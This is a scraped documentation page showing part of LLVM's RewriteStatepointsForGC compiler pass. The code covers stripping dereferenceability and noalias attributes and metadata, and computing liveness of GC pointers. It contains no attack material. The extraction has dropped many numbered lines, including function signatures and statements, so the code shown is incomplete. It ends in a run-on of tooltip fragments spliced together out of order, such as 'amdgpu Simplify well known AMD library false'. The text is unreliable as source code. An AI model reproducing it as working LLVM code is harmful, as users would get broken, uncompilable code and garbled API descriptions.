 unsigned Index) { 2385  AttrBuilder R; 2386  if (AH.getDereferenceableBytes(Index)) 2387  R.addAttribute(Attribute::get(Ctx, Attribute::Dereferenceable, 2388  AH.getDereferenceableBytes(Index))); 2389  if (AH.getDereferenceableOrNullBytes(Index)) 2390  R.addAttribute(Attribute::get(Ctx, Attribute::DereferenceableOrNull, 2391  AH.getDereferenceableOrNullBytes(Index))); 2392  if (AH.getAttributes().hasAttribute(Index, Attribute::NoAlias)) 2394  2395  if (!R.empty()) 2396  AH.setAttributes(AH.getAttributes().removeAttributes(Ctx, Index, R)); 2397 } 2398  2400  LLVMContext &Ctx = F.getContext(); 2401  2402  for (Argument &A : F.args()) 2403  if (isa<PointerType>(A.getType())) 2405  A.getArgNo() + AttributeList::FirstArgIndex); 2406  2407  if (isa<PointerType>(F.getReturnType())) 2409 } 2410  2411 /// Certain metadata on instructions are invalid after running RS4GC. 2412 /// Optimizations that run after RS4GC can incorrectly use this metadata to 2413 /// optimize functions. We drop such metadata on the instruction. 2415  if (!isa<LoadInst>(I) && !isa<StoreInst>(I)) 2416  return; 2417  // These are the attributes that are still valid on loads and stores after 2418  // RS4GC. 2419  // The metadata implying dereferenceability and noalias are (conservatively) 2420  // dropped. This is because semantically, after RewriteStatepointsForGC runs, 2421  // all calls to gc.statepoint "free" the entire heap. Also, gc.statepoint can 2422  // touch the entire heap including noalias objects. Note: The reasoning is 2423  // same as stripping the dereferenceability and noalias attributes that are 2424  // analogous to the metadata counterparts. 2425  // We also drop the invariant.load metadata on the load because that metadata 2426  // implies the address operand to the load points to memory that is never 2427  // changed once it became dereferenceable. This is no longer true after RS4GC. 2428  // Similar reasoning applies to invariant.group metadata, which applies to 2429  // loads within a group. 2430  unsigned ValidMetadataAfterRS4GC[] = {LLVMContext::MD_tbaa, 2431  LLVMContext::MD_range, 2432  LLVMContext::MD_alias_scope, 2433  LLVMContext::MD_nontemporal, 2434  LLVMContext::MD_nonnull, 2435  LLVMContext::MD_align, 2436  LLVMContext::MD_type}; 2437  2438  // Drops all metadata on the instruction other than ValidMetadataAfterRS4GC. 2439  I.dropUnknownNonDebugMetadata(ValidMetadataAfterRS4GC); 2440 } 2441  2443  if (F.empty()) 2444  return; 2445  2446  LLVMContext &Ctx = F.getContext(); 2447  MDBuilder Builder(Ctx); 2448  2449  // Set of invariantstart instructions that we need to remove. 2450  // Use this to avoid invalidating the instruction iterator. 2451  SmallVector<IntrinsicInst*, 12> InvariantStartInstructions; 2452  2453  for (Instruction &I : instructions(F)) { 2454  // invariant.start on memory location implies that the referenced memory 2455  // location is constant and unchanging. This is no longer true after 2456  // RewriteStatepointsForGC runs because there can be calls to gc.statepoint 2457  // which frees the entire heap and the presence of invariant.start allows 2458  // the optimizer to sink the load of a memory location past a statepoint, 2459  // which is incorrect. 2460  if (auto *II = dyn_cast<IntrinsicInst>(&I)) 2461  if (II->getIntrinsicID() == Intrinsic::invariant_start) { 2462  InvariantStartInstructions.push_back(II); 2463  continue; 2464  } 2465  2466  if (MDNode *Tag = I.getMetadata(LLVMContext::MD_tbaa)) { 2467  MDNode *MutableTBAA = Builder.createMutableTBAAAccessTag(Tag); 2468  I.setMetadata(LLVMContext::MD_tbaa, MutableTBAA); 2469  } 2470  2472  2473  if (auto *Call = dyn_cast<CallBase>(&I)) { 2474  for (int i = 0, e = Call->arg_size(); i != e; i++) 2475  if (isa<PointerType>(Call->getArgOperand(i)->getType())) 2476  RemoveNonValidAttrAtIndex(Ctx, *Call, 2478  if (isa<PointerType>(Call->getType())) 2480  } 2481  } 2482  2483  // Delete the invariant.start instructions and RAUW undef. 2484  for (auto *II : InvariantStartInstructions) { 2485  II->replaceAllUsesWith(UndefValue::get(II->getType())); 2486  II->eraseFromParent(); 2487  } 2488 } 2489  2490 /// Returns true if this function should be rewritten by this pass. The main 2491 /// point of this function is as an extension point for custom logic. 2493  // TODO: This should check the GCStrategy 2494  if (F.hasGC()) { 2495  const auto &FunctionGCName = F.getGC(); 2496  const StringRef StatepointExampleName("statepoint-example"); 2497  const StringRef CoreCLRName("coreclr"); 2498  return (StatepointExampleName == FunctionGCName) || 2499  (CoreCLRName == FunctionGCName); 2500  } else 2501  return false; 2502 } 2503  2504 static void stripNonValidData(Module &M) { 2505 #ifndef NDEBUG 2506  assert(llvm::any_of(M, shouldRewriteStatepointsIn) && "precondition!"); 2507 #endif 2508  2509  for (Function &F : M) 2511  2512  for (Function &F : M) 2514 } 2515  2517  TargetTransformInfo &TTI, 2518  const TargetLibraryInfo &TLI) { 2519  assert(!F.isDeclaration() && !F.empty() && 2520  "need function body to rewrite statepoints in"); 2521  assert(shouldRewriteStatepointsIn(F) && "mismatch in rewrite decision"); 2522  2523  auto NeedsRewrite = [&TLI](Instruction &I) { 2524  if (const auto *Call = dyn_cast<CallBase>(&I)) 2525  return !callsGCLeafFunction(Call, TLI) && !isStatepoint(Call); 2526  return false; 2527  }; 2528  2529  // Delete any unreachable statepoints so that we don't have unrewritten 2530  // statepoints surviving this pass. This makes testing easier and the 2531  // resulting IR less confusing to human readers. 2533  bool MadeChange = removeUnreachableBlocks(F, &DTU); 2534  // Flush the Dominator Tree. 2535  DTU.getDomTree(); 2536  2537  // Gather all the statepoints which need rewritten. Be careful to only 2538  // consider those in reachable code since we need to ask dominance queries 2539  // when rewriting. We'll delete the unreachable ones in a moment. 2540  SmallVector<CallBase *, 64> ParsePointNeeded; 2541  for (Instruction &I : instructions(F)) { 2542  // TODO: only the ones with the flag set! 2543  if (NeedsRewrite(I)) { 2544  // NOTE removeUnreachableBlocks() is stronger than 2545  // DominatorTree::isReachableFromEntry(). In other words 2546  // removeUnreachableBlocks can remove some blocks for which 2547  // isReachableFromEntry() returns true. 2548  assert(DT.isReachableFromEntry(I.getParent()) && 2549  "no unreachable blocks expected"); 2550  ParsePointNeeded.push_back(cast<CallBase>(&I)); 2551  } 2552  } 2553  2554  // Return early if no work to do. 2555  if (ParsePointNeeded.empty()) 2556  return MadeChange; 2557  2558  // As a prepass, go ahead and aggressively destroy single entry phi nodes. 2559  // These are created by LCSSA. They have the effect of increasing the size 2560  // of liveness sets for no good reason. It may be harder to do this post 2561  // insertion since relocations and base phis can confuse things. 2562  for (BasicBlock &BB : F) 2563  if (BB.getUniquePredecessor()) { 2564  MadeChange = true; 2566  } 2567  2568  // Before we start introducing relocations, we want to tweak the IR a bit to 2569  // avoid unfortunate code generation effects. The main example is that we 2570  // want to try to make sure the comparison feeding a branch is after any 2571  // safepoints. Otherwise, we end up with a comparison of pre-relocation 2572  // values feeding a branch after relocation. This is semantically correct, 2573  // but results in extra register pressure since both the pre-relocation and 2574  // post-relocation copies must be available in registers. For code without 2575  // relocations this is handled elsewhere, but teaching the scheduler to 2576  // reverse the transform we're about to do would be slightly complex. 2577  // Note: This may extend the live range of the inputs to the icmp and thus 2578  // increase the liveset of any statepoint we move over. This is profitable 2579  // as long as all statepoints are in rare blocks. If we had in-register 2580  // lowering for live values this would be a much safer transform. 2581  auto getConditionInst = [](Instruction *TI) -> Instruction * { 2582  if (auto *BI = dyn_cast<BranchInst>(TI)) 2583  if (BI->isConditional()) 2584  return dyn_cast<Instruction>(BI->getCondition()); 2585  // TODO: Extend this to handle switches 2586  return nullptr; 2587  }; 2588  for (BasicBlock &BB : F) { 2589  Instruction *TI = BB.getTerminator(); 2590  if (auto *Cond = getConditionInst(TI)) 2591  // TODO: Handle more than just ICmps here. We should be able to move 2592  // most instructions without side effects or memory access. 2593  if (isa<ICmpInst>(Cond) && Cond->hasOneUse()) { 2594  MadeChange = true; 2595  Cond->moveBefore(TI); 2596  } 2597  } 2598  2599  // Nasty workaround - The base computation code in the main algorithm doesn't 2600  // consider the fact that a GEP can be used to convert a scalar to a vector. 2601  // The right fix for this is to integrate GEPs into the base rewriting 2602  // algorithm properly, this is just a short term workaround to prevent 2603  // crashes by canonicalizing such GEPs into fully vector GEPs. 2604  for (Instruction &I : instructions(F)) { 2605  if (!isa<GetElementPtrInst>(I)) 2606  continue; 2607  2608  unsigned VF = 0; 2609  for (unsigned i = 0; i < I.getNumOperands(); i++) 2610  if (I.getOperand(i)->getType()->isVectorTy()) { 2611  assert(VF == 0 || 2612  VF == I.getOperand(i)->getType()->getVectorNumElements()); 2613  VF = I.getOperand(i)->getType()->getVectorNumElements(); 2614  } 2615  2616  // It's the vector to scalar traversal through the pointer operand which 2617  // confuses base pointer rewriting, so limit ourselves to that case. 2618  if (!I.getOperand(0)->getType()->isVectorTy() && VF != 0) { 2619  IRBuilder<> B(&I); 2620  auto *Splat = B.CreateVectorSplat(VF, I.getOperand(0)); 2621  I.setOperand(0, Splat); 2622  MadeChange = true; 2623  } 2624  } 2625  2626  MadeChange |= insertParsePoints(F, DT, TTI, ParsePointNeeded); 2627  return MadeChange; 2628 } 2629  2630 // liveness computation via standard dataflow 2631 // ------------------------------------------------------------------- 2632  2633 // TODO: Consider using bitvectors for liveness, the set of potentially 2634 // interesting values should be small and easy to pre-compute. 2635  2636 /// Compute the live-in set for the location rbegin starting from 2637 /// the live-out set of the basic block 2640  SetVector<Value *> &LiveTmp) { 2641  for (auto &I : make_range(Begin, End)) { 2642  // KILL/Def - Remove this definition from LiveIn 2643  LiveTmp.remove(&I); 2644  2645  // Don't consider *uses* in PHI nodes, we handle their contribution to 2646  // predecessor blocks when we seed the LiveOut sets 2647  if (isa<PHINode>(I)) 2648  continue; 2649  2650  // USE - Add to the LiveIn set for this instruction 2651  for (Value *V : I.operands()) { 2653  "support for FCA unimplemented"); 2654  if (isHandledGCPointerType(V->getType()) && !isa<Constant>(V)) { 2655  // The choice to exclude all things constant here is slightly subtle. 2656  // There are two independent reasons: 2657  // - We assume that things which are constant (from LLVM's definition) 2658  // do not move at runtime. For example, the address of a global 2659  // variable is fixed, even though it's contents may not be. 2660  // - Second, we can't disallow arbitrary inttoptr constants even 2661  // if the language frontend does. Optimization passes are free to 2662  // locally exploit facts without respect to global reachability. This 2663  // can create sections of code which are dynamically unreachable and 2664  // contain just about anything. (see constants.ll in tests) 2665  LiveTmp.insert(V); 2666  } 2667  } 2668  } 2669 } 2670  2672  for (BasicBlock *Succ : successors(BB)) { 2673  for (auto &I : *Succ) { 2674  PHINode *PN = dyn_cast<PHINode>(&I); 2675  if (!PN) 2676  break; 2677  2678  Value *V = PN->getIncomingValueForBlock(BB); 2680  "support for FCA unimplemented"); 2681  if (isHandledGCPointerType(V->getType()) && !isa<Constant>(V)) 2682  LiveTmp.insert(V); 2683  } 2684  } 2685 } 2686  2688  SetVector<Value *> KillSet; 2689  for (Instruction &I : *BB) 2691  KillSet.insert(&I); 2692  return KillSet; 2693 } 2694  2695 #ifndef NDEBUG 2696 /// Check that the items in 'Live' dominate 'TI'. This is used as a basic 2697 /// sanity check for the liveness computation. 2699  Instruction *TI, bool TermOkay = false) { 2700  for (Value *V : Live) { 2701  if (auto *I = dyn_cast<Instruction>(V)) { 2702  // The terminator can be a member of the LiveOut set. LLVM's definition 2703  // of instruction dominance states that V does not dominate itself. As 2704  // such, we need to special case this to allow it. 2705  if (TermOkay && TI == I) 2706  continue; 2707  assert(DT.dominates(I, TI) && 2708  "basic SSA liveness expectation violated by liveness analysis"); 2709  } 2710  } 2711 } 2712  2713 /// Check that all the liveness sets used during the computation of liveness 2714 /// obey basic SSA properties. This is useful for finding cases where we miss 2715 /// a def. 2716 static void checkBasicSSA(DominatorTree &DT, GCPtrLivenessData &Data, 2717  BasicBlock &BB) { 2718  checkBasicSSA(DT, Data.LiveSet[&BB], BB.getTerminator()); 2719  checkBasicSSA(DT, Data.LiveOut[&BB], BB.getTerminator(), true); 2720  checkBasicSSA(DT, Data.LiveIn[&BB], BB.getTerminator()); 2721 } 2722 #endif 2723  2725  GCPtrLivenessData &Data) { 2727  2728  // Seed the liveness for each individual block 2729  for (BasicBlock &BB : F) { 2730  Data.KillSet[&BB] = computeKillSet(&BB); 2731  Data.LiveSet[&BB].clear(); 2732  computeLiveInValues(BB.rbegin(), BB.rend(), Data.LiveSet[&BB]); 2733  2734 #ifndef NDEBUG 2735  for (Value *Kill : Data.KillSet[&BB]) 2736  assert(!Data.LiveSet[&BB].count(Kill) && "live set contains kill"); 2737 #endif 2738  2739  Data.LiveOut[&BB] = SetVector<Value *>(); 2740  computeLiveOutSeed(&BB, Data.LiveOut[&BB]); 2741  Data.LiveIn[&BB] = Data.LiveSet[&BB]; 2742  Data.LiveIn[&BB].set_union(Data.LiveOut[&BB]); 2743  Data.LiveIn[&BB].set_subtract(Data.KillSet[&BB]); 2744  if (!Data.LiveIn[&BB].empty()) 2745  Worklist.insert(pred_begin(&BB), pred_end(&BB)); 2746  } 2747  2748  // Propagate that liveness until stable 2749  while (!Worklist.empty()) { 2750  BasicBlock *BB = Worklist.pop_back_val(); 2751  2752  // Compute our new liveout set, then exit early if it hasn't changed despite 2753  // the contribution of our successor. 2754  SetVector<Value *> LiveOut = Data.LiveOut[BB]; 2755  const auto OldLiveOutSize = LiveOut.size(); 2756  for (BasicBlock *Succ : successors(BB)) { 2757  assert(Data.LiveIn.count(Succ)); 2758  LiveOut.set_union(Data.LiveIn[Succ]); 2759  } 2760  // assert OutLiveOut is a subset of LiveOut 2761  if (OldLiveOutSize == LiveOut.size()) { 2762  // If the sets are the same size, then we didn't actually add anything 2763  // when unioning our successors LiveIn. Thus, the LiveIn of this block 2764  // hasn't changed. 2765  continue; 2766  } 2767  Data.LiveOut[BB] = LiveOut; 2768  2769  // Apply the effects of this basic block 2770  SetVector<Value *> LiveTmp = LiveOut; 2771  LiveTmp.set_union(Data.LiveSet[BB]); 2772  LiveTmp.set_subtract(Data.KillSet[BB]); 2773  2774  assert(Data.LiveIn.count(BB)); 2775  const SetVector<Value *> &OldLiveIn = Data.LiveIn[BB]; 2776  // assert: OldLiveIn is a subset of LiveTmp 2777  if (OldLiveIn.size() != LiveTmp.size()) { 2778  Data.LiveIn[BB] = LiveTmp; 2779  Worklist.insert(pred_begin(BB), pred_end(BB)); 2780  } 2781  } // while (!Worklist.empty()) 2782  2783 #ifndef NDEBUG 2784  // Sanity check our output against SSA properties. This helps catch any 2785  // missing kills during the above iteration. 2786  for (BasicBlock &BB : F) 2787  checkBasicSSA(DT, Data, BB); 2788 #endif 2789 } 2790  2791 static void findLiveSetAtInst(Instruction *Inst, GCPtrLivenessData &Data, 2792  StatepointLiveSetTy &Out) { 2793  BasicBlock *BB = Inst->getParent(); 2794  2795  // Note: The copy is intentional and required 2796  assert(Data.LiveOut.count(BB)); 2797  SetVector<Value *> LiveOut = Data.LiveOut[BB]; 2798  2799  // We want to handle the statepoint itself oddly. It's 2800  // call result is not live (normal), nor are it's arguments 2801  // (unless they're used again later). This adjustment is 2802  // specifically what we need to relocate 2803  computeLiveInValues(BB->rbegin(), ++Inst->getIterator().getReverse(), 2804  LiveOut); 2805  LiveOut.remove(Inst); 2806  Out.insert(LiveOut.begin(), LiveOut.end()); 2807 } 2808  2809 static void recomputeLiveInValues(GCPtrLivenessData &RevisedLivenessData, 2810  CallBase *Call, 2811  PartiallyConstructedSafepointRecord &Info) { 2812  StatepointLiveSetTy Updated; 2813  findLiveSetAtInst(Call, RevisedLivenessData, Updated); 2814  2815  // We may have base pointers which are now live that weren't before. We need 2816  // to update the PointerToBase structure to reflect this. 2817  for (auto V : Updated) 2818  if (Info.PointerToBase.insert({V, V}).second) { 2820  "Can't find base for unexpected live value!"); 2821  continue; 2822  } 2823  2824 #ifndef NDEBUG 2825  for (auto V : Updated) 2826  assert(Info.PointerToBase.count(V) && 2827  "Must be able to find base for live value!"); 2828 #endif 2829  2830  // Remove any stale base mappings - this can happen since our liveness is 2831  // more precise then the one inherent in the base pointer analysis. 2832  DenseSet<Value *> ToErase; 2833  for (auto KVPair : Info.PointerToBase) 2834  if (!Updated.count(KVPair.first)) 2835  ToErase.insert(KVPair.first); 2836  2837  for (auto *V : ToErase) 2838  Info.PointerToBase.erase(V); 2839  2840 #ifndef NDEBUG 2841  for (auto KVPair : Info.PointerToBase) 2842  assert(Updated.count(KVPair.first) && "record for non-live value"); 2843 #endif 2844  2845  Info.LiveSet = Updated; 2846 } SymbolTableList< Instruction >::iterator eraseFromParent() This method unlinks &#39;this&#39; from the containing basic block and deletes it. Definition: Instruction.cpp:67 static void rematerializeLiveValues(CallBase *Call, PartiallyConstructedSafepointRecord &Info, TargetTransformInfo &TTI) A parsed version of the target data layout string in and methods for querying it. ... Definition: DataLayout.h:112 static void unique_unsorted(SmallVectorImpl< T > &Vec) Implement a unique function which doesn&#39;t require we sort the input vector. static void computeLiveOutSeed(BasicBlock *BB, SetVector< Value *> &LiveTmp) static bool isHandledGCPointerType(Type *T) bool empty() const Definition: Function.h:686 static cl::opt< bool, true > ClobberNonLiveOverride("rs4gc-clobber-non-live", cl::location(ClobberNonLive), cl::Hidden) raw_ostream & errs() This returns a reference to a raw_ostream for standard error. MapVector< Value *, Value * > DefiningValueMapTy static PassRegistry * getPassRegistry() getPassRegistry - Access the global registry object, which is automatically initialized at applicatio... static void insertRelocationStores(iterator_range< Value::user_iterator > GCRelocs, DenseMap< Value *, AllocaInst *> &AllocaMap, DenseSet< Value *> &VisitedLiveValues) This class represents an incoming formal argument to a Function. Definition: Argument.h:29 LLVM_NODISCARD std::string str() const str - Get the contents as an std::string. Definition: StringRef.h:232 static Value * findBaseDefiningValueCached(Value *I, DefiningValueMapTy &Cache) Returns the base defining value for this value. static bool AreEquivalentPhiNodes(PHINode &OrigRootPhi, PHINode &AlternateRootPhi) static BDVState meetBDVStateImpl(const BDVState &LHS, const BDVState &RHS) NodeTy * getNextNode() Get the next node, or nullptr for the list tail. Definition: ilist_node.h:288 PassT::Result & getResult(IRUnitT &IR, ExtraArgTs... ExtraArgs) Get the result of an analysis pass for a given IR unit. Definition: PassManager.h:776 This class represents lattice values for constants. Definition: AllocatorList.h:23 #define LLVM_DUMP_METHOD Mark debug helper function definitions like dump() that should not be stripped from debug builds... Definition: Compiler.h:484 Instruction * StatepointToken The new gc.statepoint instruction itself. size_type size() const Determine the number of elements in the SetVector. Definition: SetVector.h:77 static void stripInvalidMetadataFromInstruction(Instruction &I) Certain metadata on instructions are invalid after running RS4GC. Instruction * UnwindToken Instruction to which exceptional gc relocates are attached Makes it easier to iterate through them du... A Module instance is used to store all the information related to an LLVM module. ... Definition: Module.h:65 void dropUnknownNonDebugMetadata(ArrayRef< unsigned > KnownIDs) Drop all unknown metadata except for debug locations. Definition: Metadata.cpp:1195 iterator begin() const Definition: ArrayRef.h:136 amdgpu Simplify well known AMD library false FunctionCallee Value const Twine & Name StatepointDirectives parseStatepointDirectivesFromAttrs(AttributeList AS) Parse out statepoint directives from the function attributes present in AS. Definition: Statepoint.cpp:60 static CallInst * Create(FunctionType *Ty, Value *F, const Twine &NameStr="", Instruction *InsertBefore=nullptr) A handy container for a FunctionType+Callee-pointer pair, which can be passed around as a single enti... Definition: DerivedTypes.h:170 static void checkBasicSSA(DominatorTree &DT, SetVector< Value *> &Live, Instruction *TI, bool TermOkay=false) Check that the items in &#39;Live&#39; dominate &#39;TI&#39;. static ConstantAggregateZero * get(Type *Ty) Definition: Constants.cpp:1363 This provides a very simple, boring adaptor for a begin and end iterator into a range type... This class represents a function call, abstracting a target machine&#39;s calling convention. INITIALIZE_PASS_BEGIN(RewriteStatepointsForGCLegacyPass, "rewrite-statepoints-for-gc", "Make relocations explicit at statepoints", false, false) INITIALIZE_PASS_END(RewriteStatepointsForGCLegacyPass This file contains the declarations for metadata subclasses. DominatorTree & getDomTree() Flush DomTree updates and return DomTree. Optional< std::vector< StOtherPiece > > Other Definition: ELFYAML.cpp:953 static void insertUseHolderAfter(CallBase *Call, const ArrayRef< Value *> Values, SmallVectorImpl< CallInst *> &Holders) Insert holders so that each Value is obviously live through the entire lifetime of the call... MapVector< BasicBlock *, SetVector< Value * > > KillSet Values defined in this block. const Value * getTrueValue() const The two locations do not alias at all. Definition: AliasAnalysis.h:84 Analysis pass providing the TargetTransformInfo. This instruction constructs a fixed permutation of two input vectors. static SelectInst * Create(Value *C, Value *S1, Value *S2, const Twine &NameStr="", Instruction *InsertBefore=nullptr, Instruction *MDFrom=nullptr) MapVector< BasicBlock *, SetVector< Value * > > LiveSet Values used in this block (and thus live); does not included values killed within this block... LLVMContext & getContext() const All values hold a context through their type. Definition: Value.cpp:743 static void stripNonValidAttributesFromPrototype(Function &F) MapVector< BasicBlock *, SetVector< Value * > > LiveIn Values live into this basic block (i.e. bool hasFnAttribute(Attribute::AttrKind Kind) const Return true if the function has the attribute. Definition: Function.h:323 This class implements a map that also provides access to all stored values in a deterministic order... Definition: MapVector.h:37 Metadata node. Definition: Metadata.h:863 Base class for all callable instructions (InvokeInst and CallInst) Holds everything related to callin... Definition: InstrTypes.h:1100 Analysis pass which computes a DominatorTree. Definition: Dominators.h:230 F(f) User::op_iterator arg_end() Return the iterator pointing to the end of the argument list. Definition: InstrTypes.h:1212 An instruction for reading from memory. Definition: Instructions.h:169 reverse_iterator rbegin() Definition: BasicBlock.h:278 AttrBuilder & addAttribute(Attribute::AttrKind Val) Add an attribute to the builder. Hexagon Common GEP const Instruction * getTerminator() const LLVM_READONLY Returns the terminator instruction if the block is well formed or null if the block is not well forme... Definition: BasicBlock.cpp:144 bool isVectorTy() const True if this is an instance of VectorType. Definition: Type.h:230 static void stripNonValidDataFromBody(Function &F) static BaseDefiningValueResult findBaseDefiningValueOfVector(Value *I) Return a base defining value for the &#39;Index&#39; element of the given vector instruction &#39;I&#39;... void reserve(size_type N) Definition: SmallVector.h:369 static void makeStatepointExplicit(DominatorTree &DT, CallBase *Call, PartiallyConstructedSafepointRecord &Result, std::vector< DeferredReplacement > &Replacements) bool isReachableFromEntry(const Use &U) const Provide an overload for a Use. Definition: Dominators.cpp:299 bool hasAttribute(unsigned Index, Attribute::AttrKind Kind) const Return true if the attribute exists at the given index. static void computeLiveInValues(DominatorTree &DT, Function &F, GCPtrLivenessData &Data) Compute the live-in set for every basic block in the function. iterator begin() Instruction iterator methods. Definition: BasicBlock.h:273 Value * getArgOperand(unsigned i) const Definition: InstrTypes.h:1241 unsigned getAllocaAddrSpace() const Definition: DataLayout.h:274 AnalysisUsage & addRequired() static InsertElementInst * Create(Value *Vec, Value *NewElt, Value *Idx, const Twine &NameStr="", Instruction *InsertBefore=nullptr) #define INITIALIZE_PASS_DEPENDENCY(depName) Definition: PassSupport.h:50 static void makeStatepointExplicitImpl(CallBase *Call, const SmallVectorImpl< Value *> &BasePtrs, const SmallVectorImpl< Value *> &LiveVariables, PartiallyConstructedSafepointRecord &Result, std::vector< DeferredReplacement > &Replacements) static void relocationViaAlloca(Function &F, DominatorTree &DT, ArrayRef< Value *> Live, ArrayRef< PartiallyConstructedSafepointRecord > Records) Do all the relocation update via allocas and mem2reg. This class represents the LLVM &#39;select&#39; instruction. const DataLayout & getDataLayout() const Get the data layout for the module&#39;s target platform. Definition: Module.cpp:369 This is the base class for all instructions that perform data casts. Definition: InstrTypes.h:439 &#39;undef&#39; values are things that do not have specified contents. Definition: Constants.h:1285 int getCastInstrCost(unsigned Opcode, Type *Dst, Type *Src, const Instruction *I=nullptr) const static bool isKnownBaseResult(Value *V) Given the result of a call to findBaseDefiningValue, or findBaseOrBDV, is it known to be a base point... Class to represent struct types. Definition: DerivedTypes.h:238 LLVMContext & getContext() const Get the global data context. Definition: Module.h:244 static Value * findBasePointer(Value *I, DefiningValueMapTy &Cache) For a given value or instruction, figure out what base ptr its derived from. A Use represents the edge between a Value definition and its users. Definition: Use.h:55 Value * getDerivedPtr() const Definition: Statepoint.h:387 static Value * findRematerializableChainToBasePointer(SmallVectorImpl< Instruction *> &ChainToBase, Value *CurrentValue) static bool isGCPointerType(Type *T) This provides a uniform API for creating instructions and inserting them into a basic block: either a... Definition: IRBuilder.h:779 This file contains the simple types necessary to represent the attributes associated with functions a... AttributeSet getRetAttributes() const The attributes for the ret value are returned. static ArrayRef< Use > GetDeoptBundleOperands(const CallBase *Call) void setName(const Twine &Name) Change the name of the value. Definition: Value.cpp:285 arg_iterator gc_args_begin() const Definition: Statepoint.h:241 bool remove(const value_type &X) Remove an item from the set vector. Definition: SetVector.h:157 void initializeRewriteStatepointsForGCLegacyPassPass(PassRegistry &) LLVMContext & getContext() const Retrieve the LLVM context. auto reverse(ContainerTy &&C, typename std::enable_if< has_rbegin< ContainerTy >::value >::type *=nullptr) -> decltype(make_range(C.rbegin(), C.rend())) Definition: STLExtras.h:261 static cl::opt< bool > PrintLiveSet("spp-print-liveset", cl::Hidden, cl::init(false)) Instruction * clone() const Create a copy of &#39;this&#39; instruction that is identical in all ways except the following: ... Type * getType() const All values are typed, get the type of this value. Definition: Value.h:245 bool insert(const value_type &X) Insert a new element into the SetVector. Definition: SetVector.h:141 bool isStatepoint(const CallBase *Call) Definition: Statepoint.cpp:20 const T & getValue() const LLVM_LVALUE_FUNCTION Definition: Optional.h:255 const BasicBlock * getUniquePredecessor() const Return the predecessor of this block if it has a unique predecessor block. Definition: BasicBlock.cpp:253 Class to represent array types. Definition: DerivedTypes.h:408 iterator_range< arg_iterator > gc_args() const range adapter for gc arguments Definition: Statepoint.h:249 This class represents a no-op cast from one type to another. Value * CreateVectorSplat(unsigned NumElts, Value *V, const Twine &Name="") Return a vector value that contains. Definition: IRBuilder.h:2465 ArrayRef - Represent a constant reference to an array (0 or more elements consecutively in memory)... Definition: APInt.h:32 AttrBuilder & remove(const AttrBuilder &B) Remove the attributes from the builder. const std::string & getGC() const Definition: Function.cpp:478 An instruction for storing to memory. Definition: Instructions.h:325 void replaceAllUsesWith(Value *V) Change all uses of this to point to a new Value. Definition: Value.cpp:429 ModulePass * createRewriteStatepointsForGCLegacyPass() StatepointLiveSetTy LiveSet The set of values known to be live across this safepoint. Concrete subclass of DominatorTreeBase that is used to compute a normal dominator tree... Definition: Dominators.h:144 int getAddressComputationCost(Type *Ty, ScalarEvolution *SE=nullptr, const SCEV *Ptr=nullptr) const Function * getDeclaration(Module *M, ID id, ArrayRef< Type *> Tys=None) Create or insert an LLVM Function declaration for an intrinsic, and return it. Definition: Function.cpp:1093 PreservedAnalyses run(Module &M, ModuleAnalysisManager &AM) Analysis containing CSE Info Definition: CSEInfo.cpp:20 Optional< OperandBundleUse > getOperandBundle(StringRef Name) const Return an operand bundle by name, if present. Definition: InstrTypes.h:1808 static unsigned chainToBasePointerCost(SmallVectorImpl< Instruction *> &Chain, TargetTransformInfo &TTI) SetVector< Value * > StatepointLiveSetTy void replaceUsesOfWith(Value *From, Value *To) Replace uses of one Value with another. Definition: User.cpp:20 static SetVector< Value * > computeKillSet(BasicBlock *BB) bool isVoidTy() const Return true if this is &#39;void&#39;. Definition: Type.h:141 const BasicBlock & getEntryBlock() const Definition: Function.h:664 an instruction for type-safe pointer arithmetic to access elements of arrays and structs ... Definition: Instructions.h:883 static MDTuple * get(LLVMContext &Context, ArrayRef< Metadata *> MDs) Definition: Metadata.h:1165 BasicBlock * SplitBlockPredecessors(BasicBlock *BB, ArrayRef< BasicBlock *> Preds, const char *Suffix, DominatorTree *DT=nullptr, LoopInfo *LI=nullptr, MemorySSAUpdater *MSSAU=nullptr, bool PreserveLCSSA=false) This method introduces at least one new basic block into the function and moves some of the predecess... initializer< Ty > init(const Ty &Val) Definition: CommandLine.h:432 Type * getReturnType() const Returns the type of the ret val. Definition: Function.h:168 static void recomputeLiveInValues(GCPtrLivenessData &RevisedLivenessData, CallBase *Call, PartiallyConstructedSafepointRecord &result) Given an updated version of the dataflow liveness results, update the liveset and base pointer maps f... static void RemoveNonValidAttrAtIndex(LLVMContext &Ctx, AttrHolder &AH, unsigned Index) const Instruction * getFirstNonPHI() const Returns a pointer to the first instruction in this block that is not a PHINode instruction. Definition: BasicBlock.cpp:196 static GCRegistry::Add< OcamlGC > B("ocaml", "ocaml 3.10-compatible GC") void dump(const SparseBitVector< ElementSize > &LHS, raw_ostream &out) Wrapper pass for TargetTransformInfo. A set of analyses that are preserved following a run of a transformation pass. Definition: PassManager.h:153 static AttributeSet get(LLVMContext &C, const AttrBuilder &B) Definition: Attributes.cpp:592 const_iterator getFirstInsertionPt() const Returns an iterator to the first instruction in this block that is suitable for inserting a non-PHI i... Definition: BasicBlock.cpp:223 static ConstantPointerNull * get(PointerType *T) Static factory methods - Return objects of the specified value. Definition: Constants.cpp:1432 MutableArrayRef - Represent a mutable reference to an array (0 or more elements consecutively in memo... Definition: ArrayRef.h:290 unsigned arg_size() const Definition: InstrTypes.h:1229 void insertBefore(Instruction *InsertPos) Insert an unlinked instruction into a basic block immediately before the specified instruction... Definition: Instruction.cpp:73 Value * getCalledValue() const Definition: InstrTypes.h:1280 bool hasName() const Definition: Value.h:251 LLVM Basic Block Representation. Definition: BasicBlock.h:57 The instances of the Type class are immutable: once they are created, they are never changed... Definition: Type.h:46 This is an important class for using LLVM in a threaded context. Definition: LLVMContext.h:64 size_t size() const size - Get the array size. Definition: ArrayRef.h:148 This function has undefined behavior. This is an important base class in LLVM. Definition: Constant.h:41 bool set_union(const STy &S) Compute This := This u S, return whether &#39;This&#39; changed. Definition: SetVector.h:245 ArrayRef< Use > Inputs Definition: InstrTypes.h:1001 static cl::opt< unsigned > RematerializationThreshold("spp-rematerialization-threshold", cl::Hidden, cl::init(6)) Value * getIncomingValueForBlock(const BasicBlock *BB) const SmallSet - This maintains a set of unique values, optimizing for the case when the set is small (less... Definition: SmallSet.h:134 This file contains the declarations for the subclasses of Constant, which represent the different fla... static AttributeList legalizeCallAttributes(AttributeList AL) std::pair< iterator, bool > insert(const ValueT &V) Definition: DenseSet.h:187 Interval::pred_iterator pred_begin(Interval *I) pred_begin/pred_end - define methods so that Intervals may be used just like BasicBlocks can with the... Definition: Interval.h:112 